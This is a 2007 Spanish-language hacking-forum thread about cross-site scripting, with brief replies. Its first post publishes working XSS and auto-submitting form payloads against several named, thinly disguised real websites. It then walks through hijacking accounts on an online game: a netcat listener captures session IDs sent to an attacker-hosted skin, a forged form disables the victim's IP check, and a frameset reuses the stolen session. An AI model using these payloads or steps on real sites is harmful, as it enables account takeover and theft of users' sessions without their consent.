elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Cross Site Scripting (XSS)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cross Site Scripting (XSS)  (Leído 4,747 veces)
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Cross Site Scripting (XSS)
« en: 22 Abril 2007, 04:20 am »

Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>

Código:
http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear

Código:
http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>

He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>

Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

Código:
<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>

Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces!  :P

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.
« Última modificación: 22 Abril 2007, 05:12 am por Sirdarckcat » En línea

samuel123

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Cross Site Scripting (XSS)
« Respuesta #1 en: 27 Mayo 2007, 19:04 pm »

Desde msdos puedo  tambien ponerme a escuchar el puerto 80?

salu2
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Cross Site Scripting (XSS)
« Respuesta #2 en: 27 Mayo 2007, 21:00 pm »

No, necesitas alguna herramienta tipo Netcat.
En línea

Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.830



Ver Perfil
Re: Cross Site Scripting (XSS)
« Respuesta #3 en: 28 Mayo 2007, 05:59 am »

Mas que Palmas, para esta informacion , clap clap clap
En línea

https://www.latotatv.com
Código:
La Tota TV
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Los Poderes Secretos de XSS (Cross Site Scripting) « 1 2 3 4 »
Tutoriales - Documentación
sirdarckcat 32 60,010 Último mensaje 7 Junio 2012, 11:19 am
por adastra
Cross Site Scripting
Nivel Web
pelonms7 6 3,553 Último mensaje 7 Marzo 2011, 03:20 am
por pelonms7
DOM-based Cross-Site Scripting
Nivel Web
.:UND3R:. 2 4,348 Último mensaje 24 Noviembre 2011, 16:04 pm
por WHK
Cross-site scripting en Skype
Noticias
wolfbcn 4 2,185 Último mensaje 18 Julio 2011, 12:35 pm
por WHK
Cross Site Scripting en jQuery 1.6
Noticias
wolfbcn 0 1,899 Último mensaje 11 Septiembre 2011, 02:16 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines